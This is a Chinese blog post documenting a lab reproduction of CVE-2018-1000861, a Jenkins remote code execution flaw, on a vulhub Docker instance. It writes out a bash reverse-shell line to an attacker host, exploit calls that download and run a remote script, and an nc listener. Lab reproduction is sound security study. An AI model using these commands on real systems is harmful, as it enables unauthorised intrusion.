• CVE-2018-1000861复现


    刚好群里有个朋友问到这个然后就复现了一下

    1. 漏洞描述

    Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。

    通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。

    2.环境搭建

    直接使用vulhub上的环境

    (1) 下载vulhub项目,然后进入到 vulhub/jenkins/CVE-2018-1000861目录下

    (2) 执行命令:docker-compose up -d

    (3)访问:http://192.168.222.143:8080/

    3.漏洞复现

    此漏洞没有回显,直接利用orange的exp执行命令反弹shell

    orang的exp

    https://github.com/orangetw/awesome-jenkins-rce-2019
    

    (1).在我们的web服务器写txt文本内容为:

    bash -i >& /dev/tcp/*.*.*.*/2333 0>&1
    

    (2).使用exp.py执行以下命令下载文件

    python exp.py http://192.168.222.143:8080/ "curl -o /tmp/1.sh http://192.168.0.103:85/1.txt"
    

    (3).然后在我们接收shell的机器上监听之前写的端口

    nc -lvvp 2333
    

    (4).直接bash执行我们下载的脚本

    python exp.py http://192.168.222.143:8080/ "bash /tmp/1.sh"
    

    (5).回到监听端口的机器

    可以看到已经成功获取到了shell

  • 相关阅读:
    viewmodel
    jQuery.each的function中有哪些参数
    JS,Jquery获取各种屏幕的宽度和高度
    解决点击空<a>标签返回页面顶部的问题
    JS使用getComputedStyle()方法获取CSS属性值
    html5中画布和SVG的比较
    HTML中的SVG
    Canvas绘制时钟
    用Canvas实现动画效果
    绘制文字
  • 原文地址:https://www.cnblogs.com/cwkiller/p/12578924.html
Copyright © 2020-2023  润新知